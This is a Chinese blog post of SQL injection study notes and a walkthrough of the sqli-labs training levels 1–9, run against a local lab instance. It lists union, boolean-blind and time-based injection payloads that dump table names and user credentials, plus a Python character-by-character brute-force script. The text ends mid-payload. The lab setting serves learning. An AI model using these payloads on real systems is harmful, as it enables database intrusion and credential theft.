<!DOCTYPE HTML>
<html class="no-js" lang="zh-CN">
<!--
//                            _ooOoo_
//                           o8888888o
//                           88" . "88
//                           (| -_- |)
//                            O\ = /O
//                        ____/`---'\____
//                      .   ' \\| |// `.
//                       / \\||| : |||// \
//                     / _||||| -:- |||||- \
//                       | | \\\ - /// | |
//                     | \_| ''\---/'' | |
//                      \ .-\__ `-` ___/-. /
//                   ___`. .' /--.--\ `. . __
//                ."" '< `.___\_<|>_/___.' >'"".
//               | | : `- \`.;`\ _ /`;.`/ - ` : | |
//                 \ \ `-. \_ __\ /__ _/ .-` / /
//         ======`-.____`-.___\_____/___.-`____.-'======
//                            `=---='
//                 拦截插件累计拦截逗比攻击"1381438"次！
//         .............................................
//                  佛祖保佑             永无BUG
//          佛曰:
//                  写字楼里写字间，写字间里程序员；
//                  程序人员写程序，又拿程序换酒钱。
//                  酒醒只在网上坐，酒醉还来网下眠；
//                  酒醉酒醒日复日，网上网下年复年。
//                  但愿老死电脑间，不愿鞠躬老板前；
//                  奔驰宝马贵者趣，公交自行程序员。
//                  别人笑我忒疯癫，我笑自己命太贱；
//                  不见满街漂亮妹，哪个归得程序员？
-->
<head><meta name="generator" content="Hexo 3.8.0">
    <!--[if lte IE 9]>
<meta http-equiv="refresh" content="0;url=http://yoursite.com/warn.html">
<![endif]-->
<meta charset="utf-8">

<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">

<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="renderer" content="webkit">
<meta name="viewport" content="width=device-width, initial-scale=1.0,user-scalable=no">
<meta http-equiv="mobile-agent" content="format=html5; url=http://yoursite.com">
<meta name="author" content="treebacker">
<link rel="stylesheet" href="../../../../css/SimpleStyle.min.css">

<link rel="shortcut icon" href="../../../../images/favicon.png">


<title>sql注入 - Watch Security</title>

<meta name="keywords" content="sql">

<meta name="description " content="sql injection学习">

</head>
<body>
<div id="nav">
    <nav class="nav-menu">
        <a class="site-name current" href="/" title="Tree">Tree</a>
        <a class="site-index current" href="/"><i class="fa fa-home"></i><span>首页</span></a>
        <a href="/archives" title="归档"><i class="fa fa-archives"></i><span>归档</span></a>
        <a href="/tags" title="标签"><i class="fa fa-tags"></i><span>标签</span></a>
        <!-- custom single page of menus -->
        
        
        <a href="/help" title="帮助">
            <i class="fa fa-question-circle"></i>
            <span>帮助</span>
        </a>
        
    </nav>
</div>

<div class="nav-user">
    <a class="btn-search" href="#"><i class="fa fa-search"></i></a>
    <a class="btn-read-mode" href="#"><i class="fa fa-sun-o"></i></a>
    <a class="btn-sns-qr" href="javascript:"><i class="fa fa-telegram"></i></a>
</div>

<div id="wrapper" class="clearfix">
    <div id="body">
        <div class="main" id="main">
            <div id="cover">
    <div class="cover-img"></div>
    <div class="cover-info">
        
        <h1 class="cover-siteName">Treebacker</h1>
        <h3 class="cover-siteTitle">愿麦子和麦子长在一起，愿河流与河流流归一处。</h3>
        <p class="cover-siteDesc">岁月易逝，痕影难觅</p>
        <div class="cover-sns">
            
            <div class="btn btn-github">
                <a href="https://github.com/treebacker" target="_blank" title="github" ref="friend">
                    <i class="fa fa-github"></i>
                </a>
            </div>
            
        </div>
    </div>
</div>
            <div class="page-title">
    <ul>
        <li><a href="/">最新</a></li>
        
            
                <li class="active">
                    <a href="/categories/tech-notes" data-name="技术">技术</a>
                </li>
            
                <li class="">
                    <a href="/categories/essays" data-name="随笔">随笔</a>
                </li>
            
                <li class="">
                    <a href="/categories/cdcitizen-of-the-sun" data-name="海子">海子</a>
                </li>
            
                <li class="">
                    <a href="/categories/others" data-name="其他">其他</a>
                </li>
            
        
        <li class="page-search">
    <form id="search" class="search-form">
        <label for="s" class="sr-only">请输入关键字</label>
        <input class="search-field" type="text" name="s" placeholder="请输入关键字">
        <button type="submit" class="search-form-submit" title="搜索"><i class="fa fa-search"></i></button>
    </form>
    <div class="ins-search">
    <div class="ins-search-mask"></div>
    <div class="ins-search-container">
        <div class="ins-input-wrapper">
            <input type="text" class="ins-search-input" placeholder="请输入关键词...">
            <span class="ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: '文章',
            PAGES: '页面',
            CATEGORIES: '分类',
            TAGS: '标签',
            UNTITLED: '(无标题)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '../../../../content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>
</li>

    </ul>
</div>
<div class="main-inner">
    <article class="post" itemscope="" itemtype="http://schema.org/BlogPosting">
        <div class="post-header">
            <div class="post-author clearfix">
                <a class="avatar fleft" href="" target="_blank">
                    <img width="48" src="/images/favicon.png" alt="avatar">
                </a>
                <p><span class="label">作者</span>
                    <a href="" target="_blank">Treebacker</a>
                    <span title="最后编辑于2020-01-19">2020-01-19</span>
                </p>
                <p></p>
            </div>
            <h2 class="post-title">sql注入</h2>
            <div class="post-meta">
                本文总共13040个字 | 您是第<span id="busuanzi_value_page_pv"><i class="fa fa-spinner fa-spin"></i></span>位看到它们的小伙伴
            </div>
        </div>
        <div class="post-content markdown-body">
            <h3 id="sql-注入"><a href="#sql-注入" class="headerlink" title="sql 注入"></a>sql 注入</h3><h4 id="简单分类"><a href="#简单分类" class="headerlink" title="简单分类"></a>简单分类</h4><ul>
<li><p>字符型</p>
<p>​    将输入的字段值作为字符串处理，加上引号</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=1</span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> ... <span class="keyword">where</span> <span class="keyword">id</span> = <span class="string">'1'</span>;</span><br></pre></td></tr></table></figure>
</li>
<li><p>整数型</p>
<p>不对输入的字段值做引号处理，只是作为原值</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=1</span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> ... <span class="keyword">where</span> <span class="keyword">id</span> = <span class="number">1</span>;</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h4 id="攻击方式"><a href="#攻击方式" class="headerlink" title="攻击方式"></a>攻击方式</h4><ul>
<li>显示注入（回显查询结果）<ul>
<li>数据直接回显得到</li>
</ul>
</li>
<li>盲注（不回显查询结果）<ul>
<li>通过bool方式爆破数据（查询成功与失败的结果不一致）</li>
</ul>
</li>
</ul>
<h4 id="技巧简略"><a href="#技巧简略" class="headerlink" title="技巧简略"></a>技巧简略</h4><ul>
<li><h5 id="注释"><a href="#注释" class="headerlink" title="注释"></a>注释</h5><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#(在url中由于浏览器的原因，需要url编码  %23)</span></span><br><span class="line"><span class="comment">--x(x在url中为+)</span></span><br><span class="line">;%00</span><br><span class="line"><span class="comment">/*注释*/</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>编码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"> </span><br></pre></td></tr></table></figure>
</li>
<li><p>特殊工具</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"> </span><br></pre></td></tr></table></figure>
</li>
<li><p>认证绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"> </span><br></pre></td></tr></table></figure>
</li>
<li></li>
</ul>
<h4 id="sqli-labs实战"><a href="#sqli-labs实战" class="headerlink" title="sqli-labs实战"></a>sqli-labs实战</h4><ul>
<li><h5 id="常用"><a href="#常用" class="headerlink" title="常用"></a>常用</h5><ul>
<li><p>开启</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">service mysql start</span><br><span class="line">service apache2 start</span><br></pre></td></tr></table></figure>
</li>
<li><p>查看日志</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tail /var/log/mysql/mysql.log</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><h5 id="Level1"><a href="#Level1" class="headerlink" title="Level1"></a>Level1</h5><ul>
<li><p>语法猜测</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">name</span>, <span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> <span class="keyword">id</span> = $<span class="keyword">id</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>至于id是作为字符还是整数，我们可以测试以下，根据报错信息判断。</p>
<p><img src="sql注入\1.png" alt=""></p>
</li>
<li><p>推理</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">语句 <span class="keyword">select</span> <span class="keyword">name</span>, <span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> <span class="keyword">id</span> = ‘$<span class="keyword">id</span>’ <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span></span><br><span class="line">处理测试 <span class="keyword">select</span> <span class="keyword">name</span>, <span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> <span class="keyword">id</span> = ‘<span class="number">1</span>’’ <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span></span><br><span class="line">报错会是 <span class="string">'‘1’’ limit 0,1'</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>很明显的字符型注入，可以使用单引号截断，union查询攻击。</p>
<ul>
<li><p>确定数据库名</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">union <span class="keyword">select</span> <span class="number">1</span>, <span class="keyword">database</span>()，<span class="number">4</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>得到security</p>
<p><img src="sql注入\2.png" alt=""></p>
</li>
<li><p>确定数据库下的表</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UNION <span class="keyword">SELECT</span> TABLE_NAME <span class="keyword">FROM</span> information_schema.tables <span class="keyword">WHERE</span> TABLE_SCHEMA=<span class="keyword">database</span>()</span><br></pre></td></tr></table></figure>
<p>得到四个表名</p>
<p><img src="sql注入\3.png" alt=""></p>
</li>
<li><p>泄露每个表的列</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">union <span class="keyword">select</span> <span class="number">1</span>,column_name,<span class="number">3</span> <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name = <span class="string">'tablename'</span></span><br></pre></td></tr></table></figure>
<p>泄露users表的列</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">union 1,<span class="keyword">select</span> <span class="keyword">group_concat</span>(column_name),<span class="number">3</span> <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name = <span class="string">'users'</span></span><br></pre></td></tr></table></figure>
<p><img src="sql注入\4.png" alt=""></p>
</li>
<li><p>根据表的列，泄露表的信息</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">group_concat</span>(column_name) <span class="keyword">from</span> table_name</span><br></pre></td></tr></table></figure>
<p>泄露users表的所有用户名</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">unoin <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">group_concat</span>(username),<span class="number">3</span> <span class="keyword">from</span> <span class="keyword">users</span></span><br></pre></td></tr></table></figure>
<p><img src="sql注入\5.png" alt=""></p>
<p>泄露某用户名密码，例如admin</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">union <span class="keyword">select</span> <span class="number">1</span>, username, <span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">where</span> username=<span class="string">'admin'</span></span><br></pre></td></tr></table></figure>
<p><img src="sql注入\6.png" alt=""></p>
</li>
</ul>
</li>
</ul>
</li>
<li><h4 id="level2"><a href="#level2" class="headerlink" title="level2"></a>level2</h4><ul>
<li><p>根据报错推断注入类型</p>
<p><img src="sql注入\7.png" alt=""></p>
<ul>
<li><p>与1推理类似</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">语句 <span class="keyword">select</span> <span class="keyword">name</span>, <span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> <span class="keyword">id</span> = $<span class="keyword">id</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span></span><br><span class="line">处理测试 <span class="keyword">select</span> <span class="keyword">name</span>, <span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> <span class="keyword">id</span> = <span class="number">1</span>’ <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span></span><br><span class="line">报错会是 ‘’<span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span><span class="string">'</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>因此，该注入漏洞是整数注入，并且整数id后的语句被执行，同样可以执行union语句，不需要单引号截断！</p>
</li>
<li><p>利用order by判断字段数。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#以第n列的字段作为排序依据</span></span><br><span class="line"><span class="keyword">select</span> ... <span class="keyword">from</span> ... <span class="keyword">order</span> <span class="keyword">by</span> n</span><br></pre></td></tr></table></figure>
<p><img src="sql注入\8.png" alt=""> <img src="sql注入\9.png" alt=""></p>
<p>显然，共有三个字段</p>
</li>
<li><p>再查询数据库名及相关信息</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.43.250/sqli-labs-php7-master/Less-2/?id=-1 union <span class="keyword">select</span> <span class="keyword">user</span>(),<span class="keyword">database</span>(),<span class="keyword">version</span>()</span><br></pre></td></tr></table></figure>
<p><img src="sql注入\10.png" alt=""></p>
</li>
<li><p>查询表</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1 union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">group_concat</span>(table_name),<span class="number">3</span> <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>()</span><br></pre></td></tr></table></figure>
</li>
<li><p>等等。。。同level1类似</p>
</li>
</ul>
</li>
</ul>
</li>
<li><h4 id="level3"><a href="#level3" class="headerlink" title="level3"></a>level3</h4><ul>
<li><p>同样的1’报错</p>
<p><img src="sql注入\11.png" alt=""></p>
<p>根据错误猜测查询语句语法</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">name</span>, <span class="keyword">password</span> <span class="keyword">from</span> ... <span class="keyword">where</span> <span class="keyword">id</span> = (<span class="string">'$id'</span>) <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span></span><br><span class="line">									 <span class="comment">-- id = ('1')') limit 0, 1</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>同level1一样存在字符型注入漏洞，但是这里有个<strong>()</strong>需要闭合，如下构造即可</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id = 1') ... <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="sql注入\12.png" alt=""></p>
</li>
<li><p>查询数据库名、表名、列名、项</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--数据库信息</span></span><br><span class="line">?id=-1') union <span class="keyword">select</span> <span class="keyword">user</span>(),<span class="keyword">database</span>(),<span class="keyword">version</span>() <span class="comment">--+</span></span><br><span class="line"><span class="comment">--表</span></span><br><span class="line">?<span class="keyword">id</span>=<span class="number">-1</span><span class="string">') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+</span></span><br><span class="line"><span class="string">--列</span></span><br><span class="line"><span class="string">?id=-1'</span>) <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">group_concat</span>(column_name),<span class="number">3</span> <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=<span class="string">'users'</span> <span class="comment">--+</span></span><br><span class="line"><span class="comment">--项</span></span><br><span class="line">?<span class="keyword">id</span>=<span class="number">-1</span><span class="string">') union select 1,group_concat(username),3 from users --+</span></span><br><span class="line"><span class="string">--针对项查询</span></span><br><span class="line"><span class="string">?id=-1'</span>) <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,username,<span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">where</span> username=<span class="string">'admin'</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><h5 id="level4"><a href="#level4" class="headerlink" title="level4"></a>level4</h5><ul>
<li><p>报错分析</p>
<ul>
<li><p>输入1’时正常，输入1“时报错</p>
<p><img src="sql注入\13.png" alt=""></p>
</li>
<li><p>可以看到和level3类似，不过是个双引号</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> ... <span class="keyword">where</span> <span class="keyword">id</span> = (<span class="string">"$id"</span>)</span><br><span class="line">					<span class="comment">-- where id = ("1")")</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>绕过可以分别<strong>“)</strong>闭合</p>
</li>
</ul>
</li>
<li><p>注入查询</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--数据库信息</span></span><br><span class="line">?id=0") union <span class="keyword">select</span> <span class="keyword">user</span>(),<span class="keyword">database</span>(),<span class="keyword">version</span>() <span class="comment">--+</span></span><br><span class="line"><span class="comment">--表</span></span><br><span class="line">?<span class="keyword">id</span>=<span class="number">0</span><span class="string">") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+</span></span><br><span class="line"><span class="string">--列</span></span><br><span class="line"><span class="string">id=0"</span>) <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>, <span class="keyword">group_concat</span>(column_name),<span class="number">3</span> <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=<span class="string">'users'</span> <span class="comment">--+</span></span><br><span class="line"><span class="comment">--项</span></span><br><span class="line">?<span class="keyword">id</span>=<span class="number">0</span><span class="string">") union select 1,group_concat(username),3 from users --+</span></span><br><span class="line"><span class="string">--查询记录</span></span><br><span class="line"><span class="string">?id=0"</span>) <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,username,<span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">where</span> username=<span class="string">'admin'</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><h5 id="level5"><a href="#level5" class="headerlink" title="level5"></a>level5</h5><ul>
<li><p>和level1类似，只是不再显示从数据库获取的数据，但是注入的语句同样可以执行。也就是盲注！</p>
</li>
<li><p>此时可以根据成功和错误的回复不同，爆破关键字段。</p>
</li>
<li><p>有用的函数</p>
<ul>
<li><p>left(str, num)，截取str字符串的从左数的num个字符。不区分大小写</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">-- 判断数据库名的第一位是不是s</span></span><br><span class="line">left(database(), 1) = 's'</span><br><span class="line"><span class="comment">--判断数据库名的前两位是不是se</span></span><br><span class="line">left(database(), 2) = 'se'</span><br></pre></td></tr></table></figure>
<p>像这样，我们写脚本，逐位的爆破出database</p>
</li>
<li><p>但是有个问题需要解决，database名的长度如何确定？<strong>length</strong>函数可以帮我们解决</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">-- 判断database名长度是10</span></span><br><span class="line">length(database()) = 10</span><br></pre></td></tr></table></figure>
</li>
<li><p>发现一个有趣的，当我使用了不存在的函数时，报错里似乎有数据库信息</p>
<p><img src="sql注入\14.png" alt=""></p>
</li>
<li><p>substr(str, a, b)</p>
</li>
</ul>
</li>
<li><p>注入思路</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--length + left爆破database名</span></span><br><span class="line">and left((<span class="keyword">select</span> <span class="keyword">database</span>()), %d) = <span class="string">'%s'</span> <span class="comment">--+</span></span><br><span class="line"><span class="comment">--length + left 爆破表名</span></span><br><span class="line"><span class="keyword">and</span> <span class="keyword">left</span>((<span class="keyword">select</span> <span class="keyword">group_concat</span>(table_name) <span class="keyword">FROM</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>()), %d) =<span class="string">'%s'</span> <span class="comment">--+</span></span><br><span class="line"></span><br><span class="line"><span class="comment">--爆破列</span></span><br><span class="line"><span class="keyword">and</span> <span class="keyword">left</span>((<span class="keyword">select</span> <span class="keyword">group_concat</span>(column_name) <span class="keyword">FROM</span> information_schema.columns <span class="keyword">where</span> table_name=<span class="string">'users'</span>), %d) =<span class="string">'%s'</span> <span class="comment">--+</span></span><br><span class="line"></span><br><span class="line"><span class="comment">--爆破用户名</span></span><br><span class="line"> <span class="keyword">and</span> <span class="keyword">left</span>((<span class="keyword">select</span> <span class="keyword">group_concat</span>(username) <span class="keyword">FROM</span> <span class="keyword">users</span>), %d) =<span class="string">'%s'</span> <span class="comment">--+</span></span><br><span class="line"> </span><br><span class="line"><span class="comment">--爆破密码</span></span><br><span class="line"><span class="keyword">and</span> <span class="keyword">left</span>((<span class="keyword">select</span> <span class="keyword">password</span> <span class="keyword">FROM</span> <span class="keyword">users</span> <span class="keyword">where</span> username=<span class="string">'admin'</span>), %d) =<span class="string">'%s'</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
</ul>
<pre><code>* 通用的爆破脚本(不同的目的，只需调整url，即爆破sql语句)

  <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">url = <span class="string">"http://localhost/sqli-labs-php7-master/Less-5/?id=1'"</span></span><br><span class="line">	url += <span class="string">" and left((select group_concat(table_name) FROM information_schema.tables where table_schema = database()), %d) ='%s' --+"</span></span><br><span class="line"></span><br><span class="line">	name = <span class="string">''</span></span><br><span class="line">	length = <span class="number">1</span></span><br><span class="line">	<span class="keyword">while</span>  length &lt; <span class="number">30</span>:</span><br><span class="line">		<span class="keyword">for</span> i <span class="keyword">in</span> string.printable:</span><br><span class="line">			r = s.get(url % (length, name+i))</span><br><span class="line">			<span class="comment">#print r.text</span></span><br><span class="line">			<span class="keyword">if</span> <span class="string">"You are in"</span> <span class="keyword">in</span> r.text:</span><br><span class="line">				name += i</span><br><span class="line">				length += <span class="number">1</span></span><br><span class="line">				<span class="keyword">print</span> <span class="string">"name ==&gt; "</span>, name</span><br><span class="line">	<span class="keyword">print</span> <span class="string">"name ==&gt; "</span>, name</span><br></pre></td></tr></table></figure>
</code></pre><ul>
<li><h5 id="level6"><a href="#level6" class="headerlink" title="level6"></a>level6</h5><ul>
<li>类似于level5，只是是个双引号的闭合。</li>
</ul>
</li>
<li><h5 id="level7"><a href="#level7" class="headerlink" title="level7"></a>level7</h5><ul>
<li><p>1’测试得到报错不太一样</p>
<p><img src="sql注入\15.png" alt=""></p>
<p>分析下，应该是<strong>‘))</strong>闭合</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">where</span> <span class="keyword">id</span> = ((<span class="string">'$id'</span>))</span><br></pre></td></tr></table></figure>
</li>
<li><p>构造注入，同样是盲注, 同样利用上述的length和left配合就可以爆破。</p>
</li>
</ul>
</li>
<li><h5 id="level8"><a href="#level8" class="headerlink" title="level8"></a>level8</h5><ul>
<li><p>1’无错误回显，1‘ –+能够正常执行。</p>
<p>说明存在字符型sql注入漏洞，单引号闭合，但是关闭了错误回显。</p>
</li>
<li><p>虽然关闭了错误回显，但是sql语句的执行结果正确与否仍然会产生不同的回复。爆破仍然可行！</p>
</li>
</ul>
</li>
<li><h5 id="level9"><a href="#level9" class="headerlink" title="level9"></a>level9</h5><ul>
<li><p>不管怎么构造测试，回显一直是一样的。。。</p>
<p>查看源码，</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$sql="<span class="keyword">SELECT</span> * <span class="keyword">FROM</span> <span class="keyword">users</span> <span class="keyword">WHERE</span> <span class="keyword">id</span>=<span class="string">'$id'</span> <span class="keyword">LIMIT</span> <span class="number">0</span>,<span class="number">1</span><span class="string">";</span></span><br></pre></td></tr></table></figure>
<p>同样存在字符型注入漏洞，但是由于不会输出有用信息。之前的爆破方式不再起作用。</p>
</li>
<li><p>注入手法</p>
<ul>
<li><p><strong>时间延迟注入</strong>，由于我们注入的sql语句是会被执行的，那也包括sleep函数延迟。</p>
<p>这里需要用到</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--return expr1=true? expr2:expr3</span></span><br><span class="line">if(expr1, expr2, expr3)</span><br><span class="line"></span><br><span class="line"><span class="comment">--sleep for num seconds</span></span><br><span class="line">sleep(num)</span><br><span class="line"></span><br><span class="line"><span class="comment">--time for get response from the server</span></span><br><span class="line">r = s.get()</span><br><span class="line">r.elapsed.total_seconds()</span><br></pre></td></tr></table></figure>
<p>注入payload</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--猜测数据库名,猜错了返回1，猜对了执行sleep(5)  《节约爆破时间》</span></span><br><span class="line">?id=1' and if(left(database(),1)='e',sleep(5),1) <span class="comment">--+</span></span><br><span class="line">if r.elapsed.total_seconds() &gt; 5:</span><br><span class="line">	next</span><br><span class="line">	</span><br><span class="line"><span class="comment">--猜测表名</span></span><br><span class="line">and if(left((<span class="keyword">select</span> <span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>()), %d)=<span class="string">'%s'</span>, <span class="keyword">sleep</span>(<span class="number">5</span>), <span class="number">1</span>) <span class="comment">--+</span></span><br><span class="line"></span><br><span class="line"><span class="comment">--猜测列</span></span><br><span class="line"><span class="keyword">and</span> <span class="keyword">if</span>(<span class="keyword">left</span>((<span class="keyword">select</span> <span class="keyword">group_concat</span>(column_name) <span class="keyword">from</span> information_schema.columns<span class="string">"where table_name='users'), %d)='%s',sleep(5),1) --+</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">--输出列内容</span></span><br><span class="line"><span class="string">and if(left((select group_concat(username) from users),%d)='%s',sleep(5),1) --+</span></span><br><span class="line"><span 